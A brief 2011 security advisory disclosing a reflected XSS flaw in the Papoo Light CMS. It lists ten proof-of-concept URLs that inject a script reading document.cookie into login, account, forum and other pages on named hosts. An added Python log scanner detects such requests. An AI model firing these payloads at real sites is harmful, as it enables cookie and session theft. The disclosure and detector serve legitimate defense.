Vulnerability Overview:
==========================
The CMS Papoo Light Version contains an XSS vulnerability
==================
Technical Analysis:
==================
http://www.2cto.com/papoo/papoo_light/index.php/"></a><script>alert(document.cookie);</script>
http://vip.2cto.com/papoo/papoo_light/kontakt.php/"></a><script>alert(document.cookie);</script>
http://bbs.2cto.com/papoo/papoo_light/inhalt.php/"></a><script>alert(document.cookie);</script>
http://www.honhei.com/papoo/papoo_light/forum.php/"></a><script>alert(document.cookie);</script>
http://www.2cto.com/papoo/papoo_light/guestbook.php/"></a><script>alert(document.cookie);</script>
http://www.2cto.com/papoo/papoo_light/account.php/"></a><script>alert(document.cookie);</script>
http://www.2cto.com/papoo/papoo_light/login.php/"></a><script>alert(document.cookie);</script>
http://www.2cto.com/papoo/papoo_light/index/"></a><script>alert(document.cookie);</script>
http://www.2cto.com/papoo/papoo_light/forumthread.php/"></a><script>alert(document.cookie);</script>
http://www.2cto.com/papoo/papoo_light/forum/"></a><script>alert(document.cookie);</script>
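
Added example, not part of the original advisory: a check over web server access logs for the request shape listed above, where HTML markup follows a Papoo Light entry point in the URL path. The combined-style log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Path shape taken from the advisory's URLs: a Papoo Light entry point
# (with or without ".php") followed by extra path segments.
ENTRY = re.compile(r"/papoo_light/(\w+)(?:\.php)?/(.+)", re.IGNORECASE | re.DOTALL)
# Characters that let a reflected path leave an HTML attribute or tag.
# A quote in a legitimate path is also flagged, so review hits by hand.
MARKUP = re.compile(r"[\"'<>]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP range, assumed log format).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Sep/2011:10:00:00 +0000] "GET /papoo/papoo_light/index.php HTTP/1.1" 200 5120',
    '192.0.2.11 - - [12/Sep/2011:10:00:05 +0000] "GET /papoo/papoo_light/kontakt.php/'
    '%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E HTTP/1.1" 200 5301',
    '192.0.2.12 - - [12/Sep/2011:10:00:09 +0000] "GET /papoo/papoo_light/forum/'
    '%2522%253E%253Cscript%253E HTTP/1.1" 200 5290',
    '192.0.2.13 - - [12/Sep/2011:10:00:12 +0000] "GET /papoo/papoo_light/css/style.css HTTP/1.1" 200 812',
]

def decode(path, rounds=3):
    """Percent-decode repeatedly so double-encoded markup is still seen."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def suspicious_path_info(request_target):
    """Return the decoded trailing path if it carries markup, else None."""
    path = decode(request_target.split("?", 1)[0])
    match = ENTRY.search(path)
    if not match:
        return None
    trailing = match.group(2)
    return trailing if MARKUP.search(trailing) else None

def scan(lines):
    """Return (client, decoded trailing path) for each flagged request."""
    hits = []
    for line in lines:
        request = REQUEST.search(line)
        trailing = suspicious_path_info(request.group(1)) if request else None
        if trailing:
            hits.append((line.split(" ", 1)[0], trailing))
    return hits

if __name__ == "__main__":
    for client, trailing in scan(SAMPLE_LOG):
        print(client, repr(trailing))
```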
=========
Fix:
=========
Upgrade to the latest version
====================
Disclosure Timeline:
====================
12-Sep-2011 - informed the developers
12-Sep-2011 - release date of this security advisory
12-Sep-2011 - response and fix by vendor
12-Sep-2011 - post on BugTraq